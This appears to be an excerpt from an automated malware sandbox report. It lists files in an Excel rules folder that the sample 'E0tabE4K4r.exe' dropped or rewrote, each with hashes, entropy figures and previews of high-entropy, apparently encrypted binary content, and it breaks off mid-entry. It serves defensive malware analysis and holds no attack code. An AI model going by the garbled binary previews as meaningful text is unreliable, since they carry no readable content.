                                                                                                                                                  Preview:<?xml.K.c..TR>9@?.n...[;...X......H..F...N...c.<...'Z....}. H......v.}r...f.RI..".V%.......Vnk....$|...?y.h.JHPw(._.d.rg..s.h..K...+zf*.K..o9Nh$.D. ...:I.<...P....nY...^..m..E..W....n.r...=.X..^..B..s.w.c.LSM..2<.l^_..`...oFm....k-...W.7..u3....I......X.! p:|...c..Hz8...Sf..w....y6......R....e[.M_8i/.U..%...l:..g<......?.+.h.......e-..+Mb........-..xX.. Y..h.>..,.E.b..Q..E^a..m/...Z.h)g.4..73..H..y;%h...7*<Qs..C..V..Ep#V..M.H.Nn..?.....g.+.../=!jB..rY....#.....%.3.+...^.*.o.}.y.xB$+..la....$4..=......2.@|..1.9.i.....5..b...O:..}....@U....Cg.....E..W....+%m#[...q.pZ..YnD.<-....Z@t,".X....!..46.2..o.^u.{.....]....~...4....f.zA.y>l..~d.OCB.)(3.R.|'..2^1.+)..V |.Ykl..A4..~a'IS..N..*..k.....#.l-.i..W.g.....P...|..U.a.HO....s8.y7...>`."d..,..X..m.\...^.sx...gl.K..<N.i.p/U.bB./A..].j.v....I.. ..@...g..../...'c.Hk.E.E..A.xFto./,...E....KM&.4L.?1[A.....>.~.\s:L.0X..}..F>....V..P..R..3FVk.a....aV.J/.7.S.J.'.Q{...p..-x.u...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68040v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):862
                                                                                                                                                  Entropy (8bit):7.77212905192466
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:TDDItAUV+3iZk78gHbCN2vYwzkXVFa1tNV2bD:TDsm09W78UrkimD
                                                                                                                                                  MD5:9BF7A28795F9A317DF2CBF6330F43BE2
                                                                                                                                                  SHA1:F0A34372D1AF1474148A1BD66CD245957681D061
                                                                                                                                                  SHA-256:6B3322882A2440BE0B213B910930AF4ADF1E9D7EA9C3875D79E92B73CC44A064
                                                                                                                                                  SHA-512:24D13DF0C87C9D40ECA0654BE87E67C27417B7053AB3FE0EDAAB91FDABD623FE400EB7A9D21B4ED52BD4FED3846FD7393390E40EB7F3C5A4DDFF7812A341B9A6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.&.....,6}=C..,...0..H.:.u}w.Oq...X.c.8.*]?F.Sa..I........#d.Yl........*?...j.....v8RrirX..>.....@..!.D..w..l.E.|P.......v..-..'\.....f........`a.D.Vv.4.fk.{...o.M..$.(.....VC."t....b....u.BDx....)C....W..".dAq.5.9.\..b..Y.i..p..tP.}6(.0..H.y.hS&..q...4q.j:..c.f.L.R.1.#....[.I..zI.".n+W.A.|n.S.4.I...R..........Ws...$...&m._..$J..v..&Z.<<UM...jm.....2.(-...#.......C.5....V....c...b..!Lq.Z......."...$@.%,b.|..>......F..z..hD.7t..NU0..I..KX Q.a.Z].6#...:...v.^.2.O.....;..u.....3...(.#C..O..*.T..T...rg@*M...|..0..... z.......j....3.KA.i.%v.Z(.[.2...EQr..:!.'i.;.n..h..=,5D.;..N.....S$,.L_.N..bU.E..p.{H.2.....;.......W....e..D.z#J.|.....0e-z_..L.l..A.g..p.\Q.l.PS%."...o@-....v.f.9.h...#=..>.pl.......:.w.f/VM.T.b...A.....,|..bmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule69600v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1376
                                                                                                                                                  Entropy (8bit):7.855637137662409
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ienL5qTT0+jABN7SuQsqITnRv6CZW/6sYcB4IIshIFOIB+2bD:rnLEA+W2ugITnRyCICsYcQshI0IfD
                                                                                                                                                  MD5:311347181A28938411733D54E7CF49DB
                                                                                                                                                  SHA1:14D47108F40E4FF8982A69EF11575C897EF5D600
                                                                                                                                                  SHA-256:28568A90FDEE55DB3BD8FA263082BA9E7228F6FA5C95546475486FC3DFD368EA
                                                                                                                                                  SHA-512:B46386248AB0A174607A47AAB4D519E118B33814A723A475C564B77EBB014A503C8D7BFA7077CC8AFD44A2BB1BE6D28CE7BFD13D7EACBC42677F0E50FCD2ED74
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlA4......i#.>#.C!PU)...E|...;T..(........#....I......V..f~....bN.....G7....W.?..F.LT...(.....Uc)........?^.%.\M.....5Q.*...?..pX.........2.0..c!....+-.I.....4F.:.F..6^..a..>..<K.D..G9...s..5...tMG......M&...^;....G3.:...rT.C>..1.X.8....F.j.x>.]_...g}...ta..Xm....p8(.|DDv..;C7Z.......`ZSv&.i..V.m.I^..F.L..m.....:.}...v(...d6...xv..!.."..eeC..o/Q...S.e....Q0..^.LE..(...-B\...la.v..C<_.........0t.(n_.V...\....\.g....@%`Jg.....:?2...X*`.jzp...q............./q...&..l..o..5.\I0....@...0...e..B..K.q.A...~..2..q./..X..g.G.0..~.....Z.I..p3=.4;mO........y....[!.\E.....I..1O..$p>.\.].$hp.aa3P.<......E.Cj......<.&./,......I.wS.*..V../...$k_D.x".,.B..p...wO...."_...y..?~.0.c...!.').z..$.xt....p.U.Q0.N.K.s.5B.VN|....\..c..LK.%.....<.=9`:.8.!#.MT..| S.eO..J....u>......._..&.L.'.$........lJ..x.a.O...m^:.......... O...eFPK.?M...^S.........KT.66....B&..".].4..~.#.P.Qov...tg..T..+.;..r...=Zf..?...o...a.....c3.....bv<G....Jn...8=#mR..3...Z...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700000v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2037
                                                                                                                                                  Entropy (8bit):7.909569565805713
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:SrqTNHwRJ6TzJj0A7v8ft8eolw9sUwLJ5vkqj8dGf4SPzs5vSD:SrS1JdIfV7sU2sLGfPQ5v6
                                                                                                                                                  MD5:877DA57B714EE90AF79DE8F1D718644C
                                                                                                                                                  SHA1:EC045CDBABC34931C4260466C510B745A554FE9C
                                                                                                                                                  SHA-256:C9037D5A08010B9823B7B2B6BFC6CA0867FCAD21ECD4B5A1FE7042F208758160
                                                                                                                                                  SHA-512:A2918E6A8079DE549CA35BED1BFACDB5CCD712EAE7FD88954EE432F0EBC04BE6B9DE0939692AE37AB56A46FC2AC76274E89C448B5212C7CD5C043303308C49A5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..W.S...g..T.rz%.{..........KS...H....T.$..W)>v..R8.n.9...=...v......>..-:.m....d90.'4^7.0.O..@...U$.w.....2..Z............Y.lOu...[..e..b.A..b\6.`.X.......Ms.j.f.8..>..B_b...B....Lu.f...9g..... .rmn.t..u0.........4.....%...]Pp%.W..tq...}..X.`.R..q..}G.h.0UV5...K/..Mf.....RE..@..l......\(Q.....$182..k..^I7.i|....dx...=9.....tf,v.#...K............F...fr..[...|.4.^..^...;...OC..?wCj7O.#.Y..6.P.)..$O.S5.bB..()%.~I...k.|....}.{.?L.,.u..B..D...5.c..................u[.(...d.Z.......*......(O....o.8....@..L..^2`9.R.-.P.d.FQ.?....u...'..!ci..X.z.....3&.`~}.W....!.7...8....0.?.hA.>CC..v....?..7.vO..=.&7..y..L...\...u,\..Q...._.}.1o.Sv......z....=. ...z.;#j..d.z@y.h..8E....bhG.........8...*...8&.D.;^..t.Xh>...d..mt.~...k.1=$.m.H8.mCB.......|.......oLr......+s............q........^h...e.Ar..g.c|s.Q....Z.*..r...)..).)Ov.......k.+.qC.....m....o.E.5.g........I........m.Y..J..Ep..)2...QA+..yc..+N.....Uc.L.....Wp.....X..?F.l.Z{RMY..^..yp.{..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700001v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2074
                                                                                                                                                  Entropy (8bit):7.910681953958139
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:SAWXWX1KBl7hXpHr1+YrF/LJJE6dTTyPQrVGj/43fd3LXw6cJdLD:S4F2bXtrF/1NTyVe179cLn
                                                                                                                                                  MD5:2CE400C5931B372460DBFFB2CA7F9F93
                                                                                                                                                  SHA1:1B90D2165C8164FC621D675F4BC12F811BAC9B71
                                                                                                                                                  SHA-256:E29300F05E3C47620A41F74B1D95EA8D28FAB689035D824BCACBCD429D3F67F9
                                                                                                                                                  SHA-512:744DB7A026CDFB9E0BA606F4C9108091B957700BB6C2A1028379ED315DF516A9E83907410D9C1B0FEA53803E53E6B42267CF3A8DDBC17B7B0010D2EBA2C694AB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml&e0g.....+.'h.fB"....h..._@.........t......2.9.!.t.....1.E.qK...!......O......$\....{.d.C............u.FP...i..2...|.zJ.6...TX...4h.1..;n....o,T../..n.e...].V.8...%...3...,.G...v.b.cd..ui6...sjl.n..K..0..|.i)Mq..LM._F....q.Je.H.J..d.....S+.r.V..f.(...vCu...$....a.J.<.z.$.BAp...p.-C".2.K..-...m5.F...6.@.tT...p..3.X;fv..V..EK|.Fn.t.x-W..D......a.U..~.v......?G...y......B.4[(.'%.,...cp&.@.:.a.c%..|.......m.~..r......C..-.]..Nm..T..l..G.4*....}......@...g.S.x.[.Z.h1.Fr.oz..%f.`..P.wI.>.,..K.V|n}.......gAU...b. .....s..0....D.e<q.n....z..bZ.n.!.@.d.wy...P.%.4..J.h...0F2.HK..'.....w.8A^.\.pW8*g....mW...2..T.P..v.J.`n....Y..RG....>+.V.s..9k.............X.r..Y..8....:W...{.#........\.E.}(...V.Z5.R.s..@K..Q...L.@..$.]Z..D.....]D..Q......|.s..&..*1^......'..P.z...6.-j...qk..C.p.Fw$yC..p.3.e......o~]...I.+&n...<e)............/..%...V....?i.-.T../t^y......)...u2.M@a..My..W.....%a.......</I..x'..m.C...b..kJJ......=.:...d...x....!.].=..C.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70002v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):878
                                                                                                                                                  Entropy (8bit):7.768926212816424
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:TLz/CtsmNTTR7+Ofp8NwqiM9ndZjlF11642bD:L/ms6xu8MdZorD
                                                                                                                                                  MD5:CDE69619806EBE99AC3CAF290A5A9C56
                                                                                                                                                  SHA1:DC557C567CFC76F323E463F74E8C8EA10D68523E
                                                                                                                                                  SHA-256:C3862FD63D365160EACF71C9259B8F55CBFE70B9DAA9FC8E45A7D65751466FC9
                                                                                                                                                  SHA-512:EE25973453E5B16AD501B9F791C9C6F50D36513EEB594D859B5368B19EAAF0F96A6938C253FF525E5C3D9FE47E0F0F6816E777D4C1B7F042CC6AF2BB44EE68F1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...'?z,_.8.x.t..z.W.1..g.# &dqU.=...e...SU..3..U.C...7...t.T.8.../..>?`&#..k....5Ck[.!X..`sV.Be.G=.@.M?...M..O....q+..D..H.+..;..b...U...e.....Fn...n.'.<5.....p.QE+.ms..e..t.SeD.Z...........eI..7 .Q-dB...7}0.^..,.h.._.0O.i....\Y1.....g\..Bu.-z..r.dD.R<...j.y...IH.._.RqHT.j......S.3.tS.....X....Lx.p..0.....(...We(....#.*.^&zu`...c...^!r...Z..........6._(..?}.k.....8.x.>1.B..X.....(...V...........F......d..'m`r.........gf....Q.;...r...x..[~.n....s(..~1KK.V;;'..(tT.c.........l.c#.+....!Z....H..g.W......p.*W...w..%.\..*......LQ\....!......R..1..g.A_....x.S.VJ.]).e.W`..y..7..7.J0.A4...D&.........@....$"..%6......uF/.t...^X"...lx......cayG..[.,..XY.....f.c.S.N.U..P....L.......x..TY...O........]J.8}.W.9...7..OH...b-Y.......#pv.~..-IC.FtR..w....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70003v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):726
                                                                                                                                                  Entropy (8bit):7.6967569801484235
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:BTIJ5x1Zj7vH3GKNkBW4yJFtDHFxbSd4F9vpsz47kMpP/qHuSUdNcii9a:B41ZndSBWDJPlxbDHxq47kMlS92bD
                                                                                                                                                  MD5:9B97E51FA7A575EF9A5F4316B932B648
                                                                                                                                                  SHA1:16E34827CCA2C65C3CA50D1423186C1C76A802F3
                                                                                                                                                  SHA-256:B16666444B690A9314BAC4FB5CBF7AFBD594870DE8F2DA189F4C9CCFFFEBAFE1
                                                                                                                                                  SHA-512:14CF2DC98EED80DAE239B813AA31F6377C644759D5D4401BC46D821E2D3691150F62E58C7162DAA98266EA5EFA3351CB3A71439F24947DBB425ED1E174AD15F3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.*.^.N....w.9]V.%..+1.h.......Y.z........BvA.u...u+..E..9-g.....e.. ...9..6B@iQ..]8....eT...28.......F...1.N...bR.x".....=.....J.i......~)...$.......Vo.Z|.j....5...;...&7Q..o{..[.=J.n.=...lrhAR.c.ja....hsR...s......j.......J./`z].E+.v.\.....-.......J7..-o.\d..mf...5(..Pn..0*.DY.U......^...*...z.T&.k.>.r;.....5.....r(.....`umo...f..%./....~......Iv..?..N..1.9...j.qz.[..t.zKbNU...hX0...W..j....]N..>..*.......p..u}..8.......:7=..aM........{K..)..7.R*...<.2...|o.....k.W..<h{...`Yy..&..~...... G.5..1.......aP...='...d..(7/V....h..E...~f}.Rf.._.R.ks`KW.....^...y.T.i.Gm...k..EmF.;..c.......D....m. ...5mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700050v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1685
                                                                                                                                                  Entropy (8bit):7.899294826919024
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:EoOYQn+M69n8NliA+/Fdk6EH77wt7Zl3KmWEkD:XAitEQA+9Y77whbyEw
                                                                                                                                                  MD5:C3729E239FBA8FD0FDC498408F52D6A8
                                                                                                                                                  SHA1:09ED2D6129E1F21F2BFE92F21AC11B77B027C7B7
                                                                                                                                                  SHA-256:8758AFC727F543DCFE77B633F9B3C2671BB13C04ABBA759A7F559DD35F42AE3C
                                                                                                                                                  SHA-512:8794AF1F301679D6BC27480795AC2148A484576941BDBD7B1CD6BC8173CC95067365FC146C10B9FC2341625918442AE7E4F589269EC9DED43B13C3DB85F4BC66
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.+.%O.hngC:.+n..B....P...,............$Q.....>:....e....X.%...<d..H........KjK...l..^HUJ.. .8.).S.)..n.r....w...e`j.3....ipo...9.3.....N.'...}.0.J....tb...4.R.}.L..D!....Wfg=|_...y.?.s......l....3u...4.I......c....S.Q. ...W.;.?....T.0g.Be....X_.._...s.1..\..4..p.....*...].(../}........^(I1a.......$.......1..z4.$...pV?.~rD.k..]./.5..O.qx|R-0...kS1v...00X;%r.k._...i..=...%.(....q.-.Mc..yIJ.....5..#!n.Z.AK.k.....2.....=^..P9.@...J.rL..).2.M..\V.|r|....9......z...r.....2.o...K:.......kel...o.(>.y.x .Q.&.CC;....=...F.0b#..(CW.....>..-> Rj!.q...w.q^.......@...}...C..O..S.D(O.4..Zw.....).....7...*..i:xa7.Ye.q..u..+..Z.r(5........A.m..:~F...S%.....S.}.i..m".....;.c.E..PI.}.5vNAd.......v~d.I....5.....[S."....K.....jU=b"..y]..l.Pn..g...:...aj'o.k.Q%.....=A|...].6.)Q.Z..:Vt_\..!.!B..'...x....=...WC..$.H.....W..x...1..7........o&.....<..H5.x{._Y.W....v..-.M.?h...$......?....6,...T.{..(!........m[9K.B...zP.".d...]....rS..w..l.c....O...g..d.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700051v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1722
                                                                                                                                                  Entropy (8bit):7.879023528961291
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:25RSEvrd6Dr8/OPrKdSye7n4o4avGmrulO/FUKYNMy5D:25RfEc/+rESyO4o/+82Oi7Nfx
                                                                                                                                                  MD5:A597EC61B4E49D92DFF0531B5F83B837
                                                                                                                                                  SHA1:24E773A39A93868994934EEB4D40536E593F8851
                                                                                                                                                  SHA-256:988465C7B15EF9F04489A682C7C5DDC676DC5E0F7DF247250F72675A90C80E70
                                                                                                                                                  SHA-512:0379B7224C9AC5015DFFEF2A9CAADC180D79806E5681F173614F4ED02EEA61EBF27B0C53AD0EE5701B136BB8F537010E076A68C7A410324F4FF289BF4B5F8CCF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..7$H.rl .UP......]L......'e/"[6H.`j....1...VE..WCr^..x{..w..g~..S.hy(9U.4.y.D.B.3...oE,..{u..o.g....4.....k...n..H..$_... n..x7.lsQ.H.....~...8.^.....e.I$....1].`.u2%.^{0..xe.\5.l..9.G.......5,..y..z...aBU...K..7.u...........e.z.Q!u....\.K(}.....|K.....;..|..D.Pb.m...wHb_r.(...+(Vv.w.....].G.9.m_..@.v.^....x.tT.......-8....7..;TEmcAj.....b.#.+....:b..NX.;9..A....}..C.&...^....R....p.p,...|...c..+.%.W,f.F0...{.....Ma........f.....U.<...^W.0.h9.B.R..)h..G.....^m..G...~.u;2.V......G.W.|]._...7.....[r..V..#.vC.._H....1@..[YI..q....{^N...|c=..(X....:o/{9...o.sA.U._4..?T.B.Q.Zo..Wl=1n..U./...\.k..H.L....*.VN.E.9...[z.....*h. ....u..p.Z...2.:..H;:...4.1v..2.}.......5w......cxr.........w.KuK..'vP.4.N...'...F...g..Q..C.....K.r.`5W%.a..+.x..THhx.."0q..q....t.}..e......+tp.:.iO..&.y.,..a.C.wy......:9c.;...r.$%.V.zY...4!.....d...2...8.Pj.{.M.z..J.O5.u..ZV.......{......C....$.:.<..Gh..T9....R!.....m..w.B.M..1g.R..zG.u....C/.KcRX^~

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70006v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):764
                                                                                                                                                  Entropy (8bit):7.710368501007843
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:L90awDB2xIolMZIf8oapM4QiWyAtNsyysunkXP/wp8CZkpzmWyksYuqLz/cwUwbk:L90aM26olQ5zAtNysunkXXz7yks587cN
                                                                                                                                                  MD5:D0C7B4673C0F68A46A4930AD9DC36955
                                                                                                                                                  SHA1:00CAD8A7CD05999E48196ACF6D46C71A59D49FAE
                                                                                                                                                  SHA-256:3A18090612473BFF1563AC7174ECDDEE74EB23A6AC9195EF99B5575503C9809F
                                                                                                                                                  SHA-512:9FD677F565ACEA405258FFD22A09C5F2314EA765A60F22A50E327C5266BEE1ADB3B7628786238AFF72455B6256BE41B157C845B07F79AA1E6D8715B2A96B8224
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.e....)L..vQ.M..K...\....j^.N9.IC.U%l~g..$I......j..F%S..Ck.......A..O{5..\.....r....p6I.....K...g`X.i.^4.?F0.g.v...~g]...t"..j.kCC......f.wK(....e.wC.OIB..U..|.ii.G..HGtxxe.9...n...7...h.j..m"....q)..N..S...AC.xH. ...K....3W..^.6...t...9.......;.....C)..9tI./.~L..S..a..LK.B.1..X..0..GQ.W..{.$.KWm...d..6.`;...J9s.I...F.}*..........umL..2P......a.x.?...8y.mL.. .^\...p.wM.....x.^.N?U....cF....g....-4|...<.oZF.7.Q.}SO......=.W../VX...g........uQ.u..U.Z.......o.j!..$.&.*a59a.Y.c.......d.......gO..r.t.%..+~...>...6.=...0."..=N\.).3..i.=}...O..VQ.\.....b.;Q....!..2.f.......07....r1\..*s+..._.....r46..6*.Y..p...L...W..kw2... ...\.:+a.`...,|4...h.3..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700100v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1691
                                                                                                                                                  Entropy (8bit):7.873538387375813
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:4DD+dghdAoiLWmG9UjOv5gfsW1jyKc4k477V5lD:kDcgfaWR2Ogd1Ox4tf
                                                                                                                                                  MD5:42D1B99F771ABF88AC2E71DF5EE75A57
                                                                                                                                                  SHA1:198FA03CF8463B47CDD4DE2F2A052242292B1ED4
                                                                                                                                                  SHA-256:66F89288E2C2166E7C6521F5375005B89B0E20F4639049C7E1BA89D407B401C2
                                                                                                                                                  SHA-512:B85F18424BBE14B97FCAF6B0567D46334BEAA012C41105D6E98B9B97D0A50ECD90C6DD4B3FE4C96BB1BFE08FA4F34445FF6614E4C6521F7CB82DE082EEEDCC59
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml^..E+Y..K9.a&*@.q.m>.4....(+L..+.>^..t...3....m.G...,2..n.)i.X..zW....C..8.<..t.*..D.cK.xpb....eI..?.....M.V....6.52........Gh.9=....WJ.~#.5k.a..0...+.]....TLm>.N.~.*(....u}#}.. ]@.1-u.y`...?ZoD....=\E..4.x.Z..yiG........:...]...ZP.Rc..K.%=M[tD..S.wa..b.Z...r..M.!..K}...I..{.. ..|....Z.U.V.b.!.`8....J{...N2.3.j{..c..2....i.n..e...1...-...<>.}~....xW.1ly1.......<....6...qzh..2...w;V...[...-.,5.aW0.0^j~...?...Z...}...\.{uw*M..,...:>?........9.6. x%4...I.l.1m....#.....^....,.Ew.........3..!..y.....*s..M.E..._.}.l...^.N...Q..n.>.....AV..=...j.....?..4.5...X>[.. ...LyT..T.RjJ........c.J.....E..*.+!..0...-W..| !.i\...j....9e.L.Wh.-....S..[.#.:.wvz@+Eq..^.;............ce#.*.N:l.........GYxFT.7.r..._......|`...Y..{...d...,uo...\..h..K....%.j..).cw^*A d...Zt./&....T..Q..c... .......m..).a%t.q..j....(....B.....x......].@....S..9.U<..yQ....A...../.z]O..^*nvPc.|P..15......Q/P..i.)....p...r.....=a..I.LK..jd...qU.fu..^_....r.A.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700101v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1728
                                                                                                                                                  Entropy (8bit):7.8730577873924
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:eBQTMwC5tThTCjGgrgvs9PS0v6QlkavN5nC/FLfKvD:/k5tThTCjG+Gs5hvNHvrr7
                                                                                                                                                  MD5:288F2CB980ED56C043590DC0C1152E33
                                                                                                                                                  SHA1:893D615C3F3DBAF0BD5233B0224A3F2433810342
                                                                                                                                                  SHA-256:30EDF1E9E4786EE306D55E52C17F302046CC8542B74659E6F98220EE9F5D64FB
                                                                                                                                                  SHA-512:8AB32E0F4B5079A9F7FCF381A6021AAB2E8C696FBBB1CF48E6CDE0B9049BFAFD4B37A3CA0C08D54CC8A85D03B4C59B47DCFE17E9D1D9572E1F5D549BAEA695C9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.{?.....Mi......m?],W#.*/.q.2)NQ...2.t......+.~.h3|..v....a...i..?(.6..O:..Oo..5t..PRT.z@..p.5.....sQ&.......QK....t...c.G....X&m..D..; ...q..(..l..b..).:.....9L....o.:...V}i.#..(v.9..;..Kf.......@.,j?4..BmX.`.......]a.y.R...%.4t.M..;....g../..&.}.o<.4.....8...f.....P..x5...^....6.|..^-q.C...'.a....#.@...P.../...+..'....6Rs..=G"...>..lV..M/.MU.\......7{.Qx..C.F.[.3... 6...+..O.('....(M2W......p~....L....6...+..7.5vg..K.........F.=.c:u.qf...NB...WQ....1"C...K(.W....,...)x....d..p......)....+.F...e.........?8..50Nk.\.>...' .x.+&.O....5......F`....x....=.= .F2.&.....v..EA.p.....8....,2\o.P..h...1...F....3. ..I.......L.{..(s..... /._S ..y..].>@.Mkl[....w.e.x."v....W..\..J.!.c.....6.Dy.......:.E...!.n...y..g$..t.&....3FPtB.q....RE..X..k55l_B-|.$....R.r-.]E.....62..8......{..2..E.g3.g>..d...V.}....f.8r..B..k.....hq......t.,.D..E.....BC..8/..am.......H6}*QFz...-.(I..+(@.p.n...L-"..N.7s...w.r.SF.......]..W.l..x....O...}lu5.Tm.....&1.P>.7..+.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700150v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1695
                                                                                                                                                  Entropy (8bit):7.879502548200801
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:nXBQFN3xn7ALur5RuuoswSqMzY2aVSMkElh7D:RCNFKM5IunwGzY2aca9
                                                                                                                                                  MD5:D003ABC11D771EF851C27D508C757C18
                                                                                                                                                  SHA1:D95F2D368A5821A8BFA0EB950374D6BB32A17E56
                                                                                                                                                  SHA-256:2ED87BE7956002FC9839ABC53857F714B5BCEF96B1A264B6A3F08CCC2F1AADA2
                                                                                                                                                  SHA-512:38E1F13018AFC3FAEF9BAE80A1B61ECC3C93FC911188CE3197D09A3C60367DED5B9EE62D03862A0566C20C87BF7739DACEC9B82BEB5B159857D3D13F678BC60A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlL.H!f.D......:I...9.7.6..A.Hl/..c....C..3`.H}....U4........M?\..K3}V..i....!........9.m-!......W0.p.u.....k:5!....hl.#.Q..)...U}.[`b"d........t.."......[.b..lHl....Z...&.mQ?.^M,.Y.........dN.........+4N..E....R..1-.T.J..g.V....]..*.L.[.-.wS...n.........mX..\..T...pwz..4.@.n8.n........s...a.7..?.+.?+dU.Q?i.2.$....D^.~.<.:f..)..A1...F.f.....@..d..+..RY@....T.7aOm....$..'%....UyW ..yACs6)K..!t.....si.[.>.s@.t.Q..E[..._....0.E.....W^]S..].i.q.)J:[.%.X..{...F..._j..Gl.9.. ..l..A.z.....2H.[#.*."r?.x%>.....%<./...k.7..@.....2l<UpYaQ2 .|b.../.0....).e..R$b9....(Y....&..L...x4..0...B%...u.'...0.zF....@....H.JZ".`..9.U..,Z.s....F.*{gl......e;V.M..DiG...lB."......>j........j..b...16*..f<.^.7z...p..\..57D.)..u.r.....CBAr....`.....$...*.;....h...^).$_.$.@...] ....<.....u.....#..Y8. X.?......<.......^..M.wE.RX...>/.&..pU....aO.........d.PM.e..KA..=8_R.^i.Vg.}...!W.l.K.......2.6.&.r.....$. ......*..E...".nG:...".q.....w&.|..(G..w..~'.-.3r

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700151v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1732
                                                                                                                                                  Entropy (8bit):7.868891354350214
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:7+TPoTw17a7BBG6CEaxiIuKj2vvNNnZoRhiGmNz7qD:7GATw17a7BHC513yvV4RkGmNC
